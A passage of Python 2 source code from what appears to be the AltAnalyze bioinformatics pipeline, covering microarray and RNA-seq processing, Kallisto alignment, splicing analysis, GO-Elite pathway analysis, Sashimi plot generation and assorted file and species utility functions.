apt_file = filepath(apt_file)
os.chmod(apt_file,0777)
midas_dir = string.replace(apt_file,'apt-probeset-summarize','apt-midas')
os.chmod(midas_dir,0777)
APT.probesetSummarize(exp_file_location_db,analysis_method,filter_probeset_types,species,root)
except Exception:
print_out = 'AltAnalyze encountered an un-expected error while running Affymetrix\n'
print_out += 'Power Tools (APT). Additional information may be found in the directory\n'
print_out += '"ExpressionInput/APT" in the output directory. You may also encounter issues\n'
print_out += 'if you are logged into an account with restricted priveledges.\n\n'
print_out += 'If this issue can not be resolved, contact AltAnalyze help or run RMA outside\n'
print_out += 'of AltAnalyze and import the results using the analysis option "expression file".\n'
print traceback.format_exc()
try:
UI.WarningWindow(print_out,'Exit')
root.destroy(); sys.exit()
except Exception:
print print_out; sys.exit()
elif 'Feature Extraction' in run_from_scratch:
from import_scripts import ProcessAgilentArrays
try: ProcessAgilentArrays.agilentSummarize(exp_file_location_db)
except Exception:
print_out = 'Agilent array import and processing failed... see error log for details...'
print traceback.format_exc()
try:
UI.WarningWindow(print_out,'Exit')
root.destroy(); sys.exit()
except Exception:
print print_out; sys.exit()
reload(ProcessAgilentArrays)
if run_from_scratch == 'Process RNA-seq reads' or run_from_scratch == 'buildExonExportFiles':
import RNASeq; reload(RNASeq); import RNASeq
for dataset in exp_file_location_db: fl = exp_file_location_db[dataset]
### The below function aligns splice-junction coordinates to Ensembl exons from BED Files and
### exports AltAnalyze specific databases that are unique to this dataset to the output directory
try: fastq_folder = fl.RunKallisto()
except Exception: print traceback.format_exc()
try: customFASTA = fl.CustomFASTA()
except Exception: customFASTA = None
processBEDfiles = True
if len(fastq_folder)>0:
### Perform pseudoalignment with Kallisto on FASTQ files
processBEDfiles=False
try:
RNASeq.runKallisto(species,dataset,root_dir,fastq_folder,mlp,returnSampleNames=False,customFASTA=customFASTA)
biotypes = 'ran'
dir_list = unique.read_directory(root_dir)
### If we are performing a splicing analysis
if perform_alt_analysis != 'no' and perform_alt_analysis != 'expression':
print '...Performing analyses on junction-RPKM versus Kallisto-TPM.'
for file in dir_list:
if '.bam' in string.lower(file):
processBEDfiles=True
if '.bed' in string.lower(file):
processBEDfiles=True
try: rpkm_threshold = fl.RPKMThreshold()
except Exception: rpkm_threshold = []
if isinstance(rpkm_threshold, int) ==False:
array_type = 'RNASeq'
fl.setArrayType(array_type)
fl.setBEDFileDir(root_dir)
fl.setRPKMThreshold(1.0)
fl.setExonExpThreshold(5.0)
fl.setGeneExpThreshold(200.0)
fl.setExonRPKMThreshold(0.5)
fl.setJunctionExpThreshold(5.0)
fl.setVendor('RNASeq')
### Export BAM file indexes
try:
from import_scripts import BAMtoJunctionBED
try: BAMtoJunctionBED.exportIndexes(root_dir)
except:
print 'BAM file indexing failed...'
print traceback.format_exc()
except: print 'BAM file support missing due to lack of pysam...'
else:
print '...Performing analyses on Kallisto-TPM values directly.'
array_type = "3'array"
fl.setArrayType(array_type)
vendor = 'other:Ensembl' ### Ensembl linked system name
fl.setVendor(vendor)
except Exception:
print traceback.format_exc()
biotypes='failed'
if processBEDfiles:
analyzeBAMs = False; bedFilesPresent = False
dir_list = unique.read_directory(fl.BEDFileDir())
for file in dir_list:
if '.bam' in string.lower(file):
analyzeBAMs=True
if '.bed' in string.lower(file):
bedFilesPresent=True
if analyzeBAMs and bedFilesPresent==False:
from import_scripts import multiBAMtoBED
bam_dir = fl.BEDFileDir()
refExonCoordinateFile = filepath('AltDatabase/ensembl/'+species+'/'+species+'_Ensembl_exon.txt')
outputExonCoordinateRefBEDfile = bam_dir+'/BedRef/'+species+'_'+string.replace(dataset,'exp.','')
analysisType = ['exon','junction','reference']
#analysisType = ['junction']
#print [fl.multiThreading()]
multiBAMtoBED.parallelBAMProcessing(bam_dir,refExonCoordinateFile,outputExonCoordinateRefBEDfile,analysisType=analysisType,useMultiProcessing=fl.multiThreading(),MLP=mlp,root=root)
biotypes = RNASeq.alignExonsAndJunctionsToEnsembl(species,exp_file_location_db,dataset,Multi=mlp)
if biotypes == 'failed':
print_out = 'No valid chromosomal positions in the input BED or BioScope files. Exiting AltAnalyze.'
if len(fastq_folder)>0:
if 'FTP' in traceback.format_exc():
print_out = 'AltAnlayze was unable to retreive a transcript fasta sequence file from the Ensembl website. '
print_out += 'Ensure you are connected to the internet and that the website http://ensembl.org is live.'
else:
print_out = 'An unexplained error was encountered with Kallisto analysis:\n'
print_out += traceback.format_exc()
try:
UI.WarningWindow(print_out,'Exit')
root.destroy(); sys.exit()
except Exception:
print print_out; sys.exit()
reload(RNASeq)
if root_dir in biotypes:
print_out = 'Exon-level BED coordinate predictions exported to:\n'+biotypes
print_out+= '\n\nAfter obtaining exon expression estimates, rename exon BED files to\n'
print_out+= 'match the junction name (e.g., Sample1__exon.bed and Sample1__junction.bed)\n'
print_out+= 'and re-run AltAnalyze (see tutorials at http://altanalyze.org for help).'
UI.InfoWindow(print_out,'Export Complete')
try: root.destroy(); sys.exit()
except Exception: sys.exit()
if predictGroups == True:
expFile = fl.ExpFile()
if array_type == 'RNASeq':
exp_threshold=100; rpkm_threshold=10
else:
exp_threshold=200; rpkm_threshold=8
RNASeq.singleCellRNASeqWorkflow(species, array_type, expFile, mlp, exp_threshold=exp_threshold, rpkm_threshold=rpkm_threshold)
goelite_run = False
if run_from_scratch == 'Process Expression file' or run_from_scratch == 'Process CEL files' or run_from_scratch == 'Process RNA-seq reads' or 'Feature Extraction' in run_from_scratch:
if (fl.NormMatrix()=='quantile' or fl.NormMatrix()=='group') and 'Feature Extraction' not in run_from_scratch:
from stats_scripts import NormalizeDataset
try: NormalizeDataset.normalizeDataset(fl.ExpFile(),normalization=fl.NormMatrix(),platform=array_type)
except Exception: print "Normalization failed for unknown reasons..."
#"""
status = ExpressionBuilder.remoteExpressionBuilder(species,array_type,
dabg_p,raw_expression_threshold,avg_all_for_ss,expression_data_format,
manufacturer,constitutive_source,data_source,include_raw_data,
perform_alt_analysis,ge_fold_cutoffs,ge_pvalue_cutoffs,ge_ptype,
exp_file_location_db,root)
reload(ExpressionBuilder) ### Clears Memory
#"""
graphics=[]
if fl.MarkerFinder() == 'yes':
### Identify putative condition-specific marker genees
import markerFinder
fl.setOutputDir(root_dir) ### This needs to be set here
exp_file = fl.ExpFile()
if array_type != "3'array": exp_file = string.replace(exp_file,'.txt','-steady-state.txt')
try:
exp_file = fl.KallistoFile() ### Override with the Kallisto expression file if present
print 'Using the Kallisto expressio file for MarkerFinder...'
except: pass
markerFinder_inputs = [exp_file,fl.DatasetFile()] ### Output a replicate and non-replicate version
markerFinder_inputs = [exp_file] ### Only considers the replicate and not mean analysis (recommended)
for input_exp_file in markerFinder_inputs:
### This applies to an ExpressionOutput DATASET file compoosed of gene expression values (averages already present)
try:
output_dir = markerFinder.getAverageExpressionValues(input_exp_file,array_type) ### Either way, make an average annotated file from the DATASET file
except Exception:
print "Unknown MarkerFinder failure (possible filename issue or data incompatibility)..."
print traceback.format_exc()
continue
if 'DATASET' in input_exp_file:
group_exp_file = string.replace(input_exp_file,'DATASET','AVERAGE')
else:
group_exp_file = (input_exp_file,output_dir) ### still analyze the primary sample
compendiumType = 'protein_coding'
if expression_data_format == 'non-log': logTransform = True
else: logTransform = False
try: markerFinder.analyzeData(group_exp_file,species,array_type,compendiumType,AdditionalParameters=fl,logTransform=logTransform)
except Exception: None
### Generate heatmaps (unclustered - order by markerFinder)
try: graphics = markerFinder.generateMarkerHeatMaps(fl,array_type,graphics=graphics,Species=species)
except Exception: print traceback.format_exc()
remove_intronic_junctions = original_remove_intronic_junctions ### This var gets reset when running FilterDABG
try:
summary_data_db['QC'] = fl.GraphicLinks()+graphics ### provides links for displaying QC and clustering plots
except Exception:
null=[] ### Visualization support through matplotlib either not present or visualization options excluded
#print '!!!!!finished expression builder'
#returnLargeGlobalVars()
expression_data_format = 'log' ### This variable is set from non-log in FilterDABG when present (version 1.16)
try:
parent_dir = fl.RootDir()+'/GO-Elite/regulated/'
dir_list = read_directory(parent_dir)
for file in dir_list:
input_file_dir = parent_dir+'/'+file
inputType = 'IDs'
interactionDirs = ['WikiPathways','KEGG','BioGRID','TFTargets']
output_dir = parent_dir
degrees = 'direct'
input_exp_file = input_file_dir
gsp = UI.GeneSelectionParameters(species,array_type,manufacturer)
gsp.setGeneSet('None Selected')
gsp.setPathwaySelect('')
gsp.setGeneSelection('')
gsp.setOntologyID('')
gsp.setIncludeExpIDs(True)
UI.networkBuilder(input_file_dir,inputType,output_dir,interactionDirs,degrees,input_exp_file,gsp,'')
except Exception:
#print traceback.format_exc()
pass
if status == 'stop':
### See if the array and species are compatible with GO-Elite analysis
system_codes = UI.getSystemInfo()
go_elite_analysis_supported = 'yes'
species_names = UI.getSpeciesInfo()
for dataset in exp_file_location_db:
fl = exp_file_location_db[dataset]; results_dir = filepath(fl.RootDir())
### Perform GO-Elite Analysis
if pathway_permutations != 'NA':
try:
print '\nBeginning to run GO-Elite analysis on alternative exon results'
elite_input_dirs = ['AltExonConfirmed','AltExon','regulated','upregulated','downregulated'] ### Run GO-Elite multiple times to ensure heatmaps are useful and to better organize results
for elite_dir in elite_input_dirs:
file_dirs = results_dir+'GO-Elite/'+elite_dir,results_dir+'GO-Elite/denominator',results_dir+'GO-Elite/'+elite_dir
input_dir = results_dir+'GO-Elite/'+elite_dir
variables = species,mod,pathway_permutations,filter_method,z_threshold,p_val_threshold,change_threshold,resources_to_analyze,returnPathways,file_dirs,root
try: input_files = read_directory(input_dir) ### Are there any files to analyze?
except Exception: input_files=[]
if len(input_files)>0:
try: GO_Elite.remoteAnalysis(variables,'non-UI',Multi=mlp); goelite_run = True
except Exception,e:
print e
print "GO-Elite analysis failed"
try: GO_Elite.moveMAPPFinderFiles(file_dirs[0])
except Exception: print 'Input GO-Elite files could NOT be moved.'
try: GO_Elite.moveMAPPFinderFiles(file_dirs[1])
except Exception: print 'Input GO-Elite files could NOT be moved.'
except Exception: pass
if goelite_run == False:
print 'No GO-Elite input files to analyze (check your criterion).'
print_out = 'Analysis complete. Gene expression\nsummary exported to "ExpressionOutput".'
try:
if use_Tkinter == 'yes':
print "Analysis Complete\n"; UI.InfoWindow(print_out,'Analysis Completed!')
tl = Toplevel(); SummaryResultsWindow(tl,'GE',results_dir,dataset,'parent',summary_data_db)
if pathway_permutations == 'NA' and run_from_scratch != 'Annotate External Results':
if go_elite_analysis_supported == 'yes':
UI.getUpdatedParameters(array_type,species,run_from_scratch,file_dirs)
try: AltAnalyzeSetup('no')
except Exception:
print traceback.format_exc()
sys.exit()
else: print '\n'+print_out; sys.exit()
except Exception:
#print 'Failed to report status through GUI.'
sys.exit()
else: altanalyze_files = status[1] ### These files are the comparison files to analyze
elif run_from_scratch == 'update DBs':
null=[] ###Add link to new module here (possibly)
#updateDBs(species,array_type)
sys.exit()
if perform_alt_analysis != 'expression': ###Thus perform_alt_analysis = 'both' or 'alt' (default when skipping expression summary step)
###### Run AltAnalyze ######
global dataset_name; global summary_results_db; global summary_results_db2
summary_results_db={}; summary_results_db2={}; aspire_output_list=[]; aspire_output_gene_list=[]
onlyAnalyzeJunctions = 'no'; agglomerate_inclusion_probesets = 'no'; filter_probesets_by = 'NA'
if array_type == 'AltMouse' or ((array_type == 'junction' or array_type == 'RNASeq') and explicit_data_type == 'null'):
if filter_probeset_types == 'junctions-only': onlyAnalyzeJunctions = 'yes'
elif filter_probeset_types == 'combined-junctions': agglomerate_inclusion_probesets = 'yes'; onlyAnalyzeJunctions = 'yes'
elif filter_probeset_types == 'exons-only': analysis_method = 'splicing-index'; filter_probesets_by = 'exon'
if filter_probeset_types == 'combined-junctions' and array_type == 'junction' or array_type == 'RNASeq': filter_probesets_by = 'all'
else: filter_probesets_by = filter_probeset_types
c = 'Ensembl'; d = 'Entrez Gene'
annotation_system = c
expression_threshold = 0 ###This is different than the raw_expression_threshold (probably shouldn't filter so set to 0)
if analysis_method == 'linearregres-rlm': analysis_method = 'linearregres';use_R = 'yes'
if gene_expression_cutoff<1:
gene_expression_cutoff = 2 ### A number less than one is invalid
print "WARNING!!!! Invalid gene expression fold cutoff entered,\nusing the default value of 2, must be greater than 1."
log_fold_cutoff = math.log(float(gene_expression_cutoff),2)
if analysis_method != 'ASPIRE' and analysis_method != 'none' and analysis_method != 'MultiPath-PSI':
if p_threshold <= 0 or p_threshold >1:
p_threshold = 0.05 ### A number less than one is invalid
print "WARNING!!!! Invalid alternative exon p-value threshold entered,\nusing the default value of 0.05."
if alt_exon_fold_variable<1:
alt_exon_fold_variable = 1 ### A number less than one is invalid
print "WARNING!!!! Invalid alternative exon fold cutoff entered,\nusing the default value of 2, must be greater than 1."
try: alt_exon_logfold_cutoff = math.log(float(alt_exon_fold_variable),2)
except Exception: alt_exon_logfold_cutoff = 1
else: alt_exon_logfold_cutoff = float(alt_exon_fold_variable)
global_addition_factor = 0
export_junction_comparisons = 'no' ### No longer accessed in this module - only in update mode through a different module
factor_out_expression_changes = 'yes' ### Use 'no' if data is normalized already or no expression normalization for ASPIRE desired
only_include_constitutive_containing_genes = 'yes'
remove_transcriptional_regulated_genes = 'yes'
add_exons_to_annotations = 'no'
exclude_protein_details = 'no'
if analysis_method == 'ASPIRE' or 'linearregres' in analysis_method: annotation_system = d
if 'linear' in analysis_method: analysis_method = 'linearregres'
if 'aspire' in analysis_method: analysis_method = 'ASPIRE'
if array_type == 'AltMouse': species = 'Mm'
#if export_NI_values == 'yes': remove_transcriptional_regulated_genes = 'no'
###Saves run-time while testing the software (global variable stored)
#import_dir = '/AltDatabase/affymetrix/'+species
#dir_list = read_directory(import_dir) #send a sub_directory to a function to identify all files in a directory
### Get Ensembl-GO and pathway annotations from GO-Elite files
universalPrintFunction(["Importing GO-Elite pathway/GO annotations"])
global go_annotations; go_annotations={}
from import_scripts import BuildAffymetrixAssociations
go_annotations = BuildAffymetrixAssociations.getEnsemblAnnotationsFromGOElite(species)
global probeset_annotations_file
if array_type == 'RNASeq': probeset_annotations_file = root_dir+'AltDatabase/'+species+'/'+array_type+'/'+species+'_Ensembl_junctions.txt'
elif array_type == 'AltMouse': probeset_annotations_file = 'AltDatabase/'+species+'/'+array_type+'/'+'MASTER-probeset-transcript.txt'
else: probeset_annotations_file = 'AltDatabase/'+species+'/'+array_type+'/'+species+'_Ensembl_probesets.txt'
#"""
if analysis_method != 'none' and analysis_method != 'MultiPath-PSI':
analysis_summary = RunAltAnalyze() ### Only run if analysis methods is specified (only available for RNA-Seq and junction analyses)
else: analysis_summary = None
if analysis_summary != None:
summary_results_db, aspire_output_gene_list, number_events_analyzed = analysis_summary
summary_data_db2 = copy.deepcopy(summary_data_db)
for i in summary_data_db2: del summary_data_db[i] ### If we reset the variable it violates it's global declaration... do this instead
#universalPrintFunction(['Alternative Exon Results for Junction Comparisons:'])
#for i in summary_data_db: universalPrintFunction([i+' '+ str(summary_data_db[i])])
exportSummaryResults(summary_results_db,analysis_method,aspire_output_list,aspire_output_gene_list,annotate_db,array_type,number_events_analyzed,root_dir)
else:
### Occurs for RNASeq when no junctions are present
summary_data_db2={}
if array_type == 'junction' or array_type == 'RNASeq':
#Reanalyze junction array data separately for individual probests rather than recipricol junctions
if array_type == 'junction': explicit_data_type = 'exon'
elif array_type == 'RNASeq': explicit_data_type = 'junction'
else: report_single_probeset_results = 'no'
### Obtain exon analysis defaults
expr_defaults, alt_exon_defaults, functional_analysis_defaults, goelite_defaults = UI.importDefaults('exon',species)
analysis_method, null, filter_probeset_types, null, null, alt_exon_fold_variable, null, null, null, null, null, null, null, calculate_normIntensity_p, null = alt_exon_defaults
filter_probesets_by = filter_probeset_types
if additional_algorithm == 'splicing-index' or additional_algorithm == 'FIRMA':
analysis_method = additional_algorithm
#print [analysis_method], [filter_probeset_types], [p_threshold], [alt_exon_fold_variable]
try: alt_exon_logfold_cutoff = math.log(float(additional_score),2)
except Exception: alt_exon_logfold_cutoff = 1
agglomerate_inclusion_probesets = 'no'
try:
summary_results_db, aspire_output_gene_list, number_events_analyzed = RunAltAnalyze()
exportSummaryResults(summary_results_db,analysis_method,aspire_output_list,aspire_output_gene_list,annotate_db,'exon',number_events_analyzed,root_dir)
if len(summary_data_db2)==0: summary_data_db2 = summary_data_db; explicit_data_type = 'exon-only'
#universalPrintFunction(['Alternative Exon Results for Individual Probeset Analyses:'])
#for i in summary_data_db: universalPrintFunction([i+' '+ str(summary_data_db[i])])
except Exception:
print traceback.format_exc()
None
#"""
### Perform dPSI Analysis
try:
if 'counts.' in fl.CountsFile(): pass
else:
dir_list = read_directory(fl.RootDir()+'ExpressionInput')
for file in dir_list:
if 'exp.' in file and 'steady-state' not in file:
fl.setExpFile(fl.RootDir()+'ExpressionInput/'+file)
#print [fl.RootDir()+'ExpressionInput/'+file]
if 'groups.' in file:
fl.setGroupsFile(search_dir+'/'+file)
except Exception:
search_dir = fl.RootDir()+'/ExpressionInput'
files = unique.read_directory(fl.RootDir()+'/ExpressionInput')
for file in files:
if 'exp.' in file and 'steady-state.txt' not in file:
fl.setExpFile(search_dir+'/'+file)
if 'groups.' in file:
fl.setGroupsFile(search_dir+'/'+file)
try:
#"""
try:
#"""
graphic_links2,cluster_input_file=ExpressionBuilder.unbiasedComparisonSpliceProfiles(fl.RootDir(),
species,array_type,expFile=fl.CountsFile(),min_events=1,med_events=1)
#"""
from import_scripts import AugmentEventAnnotations
psi_annotated = AugmentEventAnnotations.parse_junctionfiles(fl.RootDir()+'/AltResults/AlternativeOutput/',species,array_type) ### Added in 2.1.1 - adds cassette and domains annotations
except Exception:
print traceback.format_exc()
pass
#"""
inputpsi = fl.RootDir()+'AltResults/AlternativeOutput/'+species+'_'+array_type+'_top_alt_junctions-PSI-clust.txt'
useAdvancedMetaDataAnalysis = True
### Calculate ANOVA p-value stats based on groups
if array_type !='gene' and array_type != 'exon':
if useAdvancedMetaDataAnalysis:
from stats_scripts import metaDataAnalysis
if ge_ptype == 'adjp':
use_adjusted_pval = True
else:
use_adjusted_pval = False
try:
log_fold_cutoff = float(alt_exon_fold_variable)
if log_fold_cutoff == 0.1:
log_fold_cutoff = 0.1 ### For significant digits
except: log_fold_cutoff = 0.1
try:
if p_threshold <= 0 or p_threshold >1:
pvalThreshold = 0.05 ### A number less than one is invalid
else: pvalThreshold = p_threshold
except: pvalThreshold = ge_pvalue_cutoffs ### Use the gene expression p-value cutoff if NA
try:
graphics_alt = metaDataAnalysis.remoteAnalysis(species,psi_annotated,fl.GroupsFile(),
platform='PSI',log_fold_cutoff=0.1,use_adjusted_pval=use_adjusted_pval,
pvalThreshold=ge_pvalue_cutoffs)
try: summary_data_db['QC'] += graphics_alt
except Exception: summary_data_db['QC'] = graphics_alt
try: summary_data_db['QC'] += graphic_links2
except Exception: pass
except Exception:
print traceback.format_exc()
else:
matrix,compared_groups,original_data = statistics.matrixImport(inputpsi)
matrix_pvalues=statistics.runANOVA(inputpsi,matrix,compared_groups)
significantFilteredDir = statistics.returnANOVAFiltered(inputpsi,original_data,matrix_pvalues)
graphic_link1 = ExpressionBuilder.exportHeatmap(significantFilteredDir)
try: summary_data_db['QC']+=graphic_link1
except Exception: summary_data_db['QC']=graphic_link1
except Exception:
print traceback.format_exc()
import RNASeq
try:
graphic_link = RNASeq.compareExonAndJunctionResults(species,array_type,summary_results_db,root_dir)
try: summary_data_db['QC']+=graphic_link
except Exception: summary_data_db['QC']=graphic_link
except Exception:
print traceback.format_exc()
#"""
### Export the top 15 spliced genes
try:
altresult_dir = fl.RootDir()+'/AltResults/'
splicing_results_root = altresult_dir+'/Clustering/'
dir_list = read_directory(splicing_results_root)
gene_string=''
altanalyze_results_folder = altresult_dir+'/RawSpliceData/'+species
### Lookup the raw expression dir
expression_results_folder = string.replace(altresult_dir,'AltResults','ExpressionInput')
expression_dir = UI.getValidExpFile(expression_results_folder)
show_introns=False
try: altresult_dir = UI.getValidSplicingScoreFile(altanalyze_results_folder)
except Exception,e:
print traceback.format_exc()
analysisType='plot'
for file in dir_list:
if 'AltExonConfirmed' in file:
gene_dir = splicing_results_root+'/'+file
genes = UI.importGeneList(gene_dir,limit=50) ### list of gene IDs or symbols
gene_string = gene_string+','+genes
print 'Imported genes from',file,'\n'
analysisType='plot'
for file in dir_list:
if 'Combined-junction-exon-evidence' in file and 'top' not in file:
gene_dir = splicing_results_root+'/'+file
try: isoform_dir = UI.exportJunctionList(gene_dir,limit=50) ### list of gene IDs or symbols
except Exception: print traceback.format_exc()
UI.altExonViewer(species,array_type,expression_dir, gene_string, show_introns, analysisType, None); print 'completed'
UI.altExonViewer(species,array_type,altresult_dir, gene_string, show_introns, analysisType, None); print 'completed'
except Exception:
#print traceback.format_exc()
pass
if array_type != 'exon' and array_type != 'gene':
### SashimiPlot Visualization
try:
expression_results_folder = fl.RootDir()+'/ExpressionInput/'
expression_dir = UI.getValidExpFile(expression_results_folder)
show_introns=False
analysisType='plot'
top_PSI_junction = inputpsi
#isoform_dir2 = UI.exportJunctionList(top_PSI_junction,limit=50) ### list of gene IDs or symbols
altoutput_dir = export.findParentDir(top_PSI_junction)
isoform_dir2 = altoutput_dir+'/top'+str(50)+'/MultiPath-PSI.txt'
gene_string = UI.importGeneList(isoform_dir2,limit=50)
UI.altExonViewer(species,array_type,expression_dir, gene_string, show_introns, analysisType, None); print 'completed'
UI.altExonViewer(species,array_type,altresult_dir, gene_string, show_introns, analysisType, None); print 'completed'
except Exception:
print traceback.format_exc()
try:
analyzeBAMs = False
dir_list = unique.read_directory(fl.RootDir())
for file in dir_list:
if '.bam' in string.lower(file):
analyzeBAMs=True
if analyzeBAMs:
### Create sashimi plot index
from visualization_scripts import SashimiIndex
SashimiIndex.remoteIndexing(species,fl)
from visualization_scripts import SashimiPlot
print 'Exporting Sashimi Plots for the top-predicted splicing events... be patient'
try: SashimiPlot.remoteSashimiPlot(species,fl,fl.RootDir(),isoform_dir) ### assuming the bam files are in the root-dir
except Exception: pass # print traceback.format_exc()
print 'completed'
try: SashimiPlot.remoteSashimiPlot(species,fl,fl.RootDir(),isoform_dir2) ### assuming the bam files are in the root-dir
except Exception: pass #print traceback.format_exc()
print 'completed'
### Try again, in case the symbol conversion failed
SashimiPlot.justConvertFilenames(species,fl.RootDir()+'/SashimiPlots')
else:
print 'No BAM files present in the root directory... skipping SashimiPlot analysis...'
except Exception:
print traceback.format_exc()
try:
clearObjectsFromMemory(exon_db); clearObjectsFromMemory(constitutive_probeset_db)
clearObjectsFromMemory(go_annotations); clearObjectsFromMemory(original_microRNA_z_score_data)
clearObjectsFromMemory(last_exon_region_db)
"""
print 'local vars'
all = [var for var in locals() if (var[:2], var[-2:]) != ("__", "__")]
for var in all:
try:
if len(locals()[var])>500: print var, len(locals()[var])
except Exception: null=[]
"""
except Exception: null=[]
#print '!!!!!finished'
#returnLargeGlobalVars()
end_time = time.time(); time_diff = int(end_time-start_time)
universalPrintFunction(["Analyses finished in %d seconds" % time_diff])
#universalPrintFunction(["Hit Enter/Return to exit AltAnalyze"])
for dataset in exp_file_location_db:
fl = exp_file_location_db[dataset]; results_dir = filepath(fl.RootDir())
### Perform GO-Elite Analysis
if pathway_permutations != 'NA':
goelite_run = False
print '\nBeginning to run GO-Elite analysis on alternative exon results'
elite_input_dirs = ['AltExonConfirmed','AltExon','regulated','upregulated','downregulated'] ### Run GO-Elite multiple times to ensure heatmaps are useful and to better organize results
for elite_dir in elite_input_dirs:
file_dirs = results_dir+'GO-Elite/'+elite_dir,results_dir+'GO-Elite/denominator',results_dir+'GO-Elite/'+elite_dir
input_dir = results_dir+'GO-Elite/'+elite_dir
try: input_files = read_directory(input_dir) ### Are there any files to analyze?
except Exception: input_files = []
if len(input_files)>0:
variables = species,mod,pathway_permutations,filter_method,z_threshold,p_val_threshold,change_threshold,resources_to_analyze,returnPathways,file_dirs,root
try: GO_Elite.remoteAnalysis(variables,'non-UI',Multi=mlp); goelite_run = True
except Exception,e:
print e
print "GO-Elite analysis failed"
try: GO_Elite.moveMAPPFinderFiles(file_dirs[0])
except Exception: print 'Input GO-Elite files could NOT be moved.'
try: GO_Elite.moveMAPPFinderFiles(file_dirs[1])
except Exception: print 'Input GO-Elite files could NOT be moved.'
if goelite_run == False:
print 'No GO-Elite input files to analyze (check your criterion).'
print_out = 'Analysis complete. AltAnalyze results\nexported to "AltResults/AlternativeOutput".'
try:
if root !='' and root !=None:
print "Analysis Complete\n";
UI.InfoWindow(print_out,'Analysis Completed!')
try: dataset_name = dataset_name
except: dataset_name = dataset
#tl = Toplevel(); SummaryResultsWindow(tl,'AS',results_dir,dataset_name,'specific',summary_data_db2)
tl = Toplevel(); SummaryResultsWindow(tl,'GE',results_dir,dataset_name,'specific',summary_data_db)
except Exception:
print traceback.format_exc()
pass #print 'Failed to open GUI.'
skip_intro = 'yes'
if root !='' and root !=None:
if pathway_permutations == 'NA' and run_from_scratch != 'Annotate External Results':
try: UI.getUpdatedParameters(array_type,species,run_from_scratch,file_dirs)
except Exception: pass
try: AltAnalyzeSetup('no')
except Exception: sys.exit()
def exportSummaryResults(summary_results_db,analysis_method,aspire_output_list,aspire_output_gene_list,annotate_db,array_type,number_events_analyzed,root_dir):
try:
ResultsExport_module.outputSummaryResults(summary_results_db,'',analysis_method,root_dir)
#ResultsExport_module.outputSummaryResults(summary_results_db2,'-uniprot_attributes',analysis_method)
ResultsExport_module.compareAltAnalyzeResults(aspire_output_list,annotate_db,number_events_analyzed,'no',analysis_method,array_type,root_dir)
ResultsExport_module.compareAltAnalyzeResults(aspire_output_gene_list,annotate_db,'','yes',analysis_method,array_type,root_dir)
except UnboundLocalError: print "...No results to summarize" ###Occurs if there is a problem parsing these files
def checkGOEliteProbesets(fn,species):
### Get all probesets in GO-Elite files
mod_source = 'Ensembl'+'-'+'Affymetrix'
import gene_associations
try: ensembl_to_probeset_id = gene_associations.getGeneToUid(species,mod_source)
except Exception: ensembl_to_probeset_id={}
mod_source = 'EntrezGene'+'-'+'Affymetrix'
try: entrez_to_probeset_id = gene_associations.getGeneToUid(species,mod_source)
except Exception: entrez_to_probeset_id={}
probeset_db={}
for gene in ensembl_to_probeset_id:
for probeset in ensembl_to_probeset_id[gene]: probeset_db[probeset]=[]
for gene in entrez_to_probeset_id:
for probeset in entrez_to_probeset_id[gene]: probeset_db[probeset]=[]
###Import an Affymetrix array annotation file (from http://www.affymetrix.com) and parse out annotations
csv_probesets = {}; x=0; y=0
fn=filepath(fn); status = 'no'
for line in open(fn,'r').readlines():
probeset_data = string.replace(line,'\n','') #remove endline
probeset_data = string.replace(probeset_data,'---','')
affy_data = string.split(probeset_data[1:-1],'","')
if x==0 and line[0]!='#':
x=1; affy_headers = affy_data
for header in affy_headers:
y = 0
while y < len(affy_headers):
if 'Probe Set ID' in affy_headers[y] or 'probeset_id' in affy_headers[y]: ps = y
y+=1
elif x == 1:
try: probeset = affy_data[ps]; csv_probesets[probeset]=[]
except Exception: null=[]
for probeset in csv_probesets:
if probeset in probeset_db: status = 'yes';break
return status
class SpeciesData:
def __init__(self, abrev, species, systems, taxid):
self._abrev = abrev; self._species = species; self._systems = systems; self._taxid = taxid
def SpeciesCode(self): return self._abrev
def SpeciesName(self): return self._species
def Systems(self): return self._systems
def TaxID(self): return self._taxid
def __repr__(self): return self.SpeciesCode()+'|'+SpeciesName
def getSpeciesInfo():
### Used by AltAnalyze
UI.importSpeciesInfo(); species_names={}
for species_full in species_codes:
sc = species_codes[species_full]; abrev = sc.SpeciesCode()
species_names[abrev] = species_full
return species_codes,species_names
def importGOEliteSpeciesInfo():
filename = 'Config/goelite_species.txt'; x=0
fn=filepath(filename); species_codes={}
for line in open(fn,'rU').readlines():
data = cleanUpLine(line)
abrev,species,taxid,compatible_mods = string.split(data,'\t')
if x==0: x=1
else:
compatible_mods = string.split(compatible_mods,'|')
sd = SpeciesData(abrev,species,compatible_mods,taxid)
species_codes[species] = sd
return species_codes
def exportGOEliteSpeciesInfo(species_codes):
fn=filepath('Config/goelite_species.txt'); data = open(fn,'w'); x=0
header = string.join(['species_code','species_name','tax_id','compatible_algorithms'],'\t')+'\n'
data.write(header)
for species in species_codes:
if 'other' not in species and 'all-' not in species:
sd = species_codes[species]
mods = string.join(sd.Systems(),'|')
values = [sd.SpeciesCode(),sd.SpeciesName(),sd.TaxID(),mods]
values = string.join(values,'\t')+'\n'
data.write(values)
data.close()
def TimeStamp():
time_stamp = time.localtime()
year = str(time_stamp[0]); month = str(time_stamp[1]); day = str(time_stamp[2])
if len(month)<2: month = '0'+month
if len(day)<2: day = '0'+day
return year+month+day
def verifyFile(filename):
status = 'not found'
try:
fn=filepath(filename)
for line in open(fn,'rU').xreadlines(): status = 'found';break
except Exception: status = 'not found'
return status
def verifyFileLength(filename):
count = 0
try:
fn=filepath(filename)
for line in open(fn,'rU').xreadlines():
count+=1
if count>9: break
except Exception: null=[]
return count
def verifyGroupFileFormat(filename):
correct_format = False
try:
fn=filepath(filename)
for line in open(fn,'rU').xreadlines():
data = cleanUpLine(line)
if len(string.split(data,'\t'))==3:
correct_format = True
break
except Exception: correct_format = False
return correct_format
def parseExcludeGuides(excludeGuides):
guides=[]
for line in open(excludeGuides,'rU').readlines():
data = cleanUpLine(line)
if 'Guide' not in data:
guides.append(data)
return guides
def displayHelp():
fn=filepath('Documentation/commandline.txt')
print '\n################################################\nAltAnalyze Command-Line Help'
for line in open(fn,'rU').readlines():
print cleanUpLine(line)
print '\n################################################ - END HELP'
sys.exit()
def searchDirectory(directory,var):
directory = unique.filepath(directory)
files = unique.read_directory(directory)
version = unique.getCurrentGeneDatabaseVersion()
for file in files:
if var in file:
location = string.split(directory+'/'+file,version)[1][1:]
return [location]
break
###### Command Line Functions (AKA Headless Mode) ######
def commandLineRun():
print 'Running commandline options'
import getopt
#/hd3/home/nsalomonis/normalization/mir1 - boxer
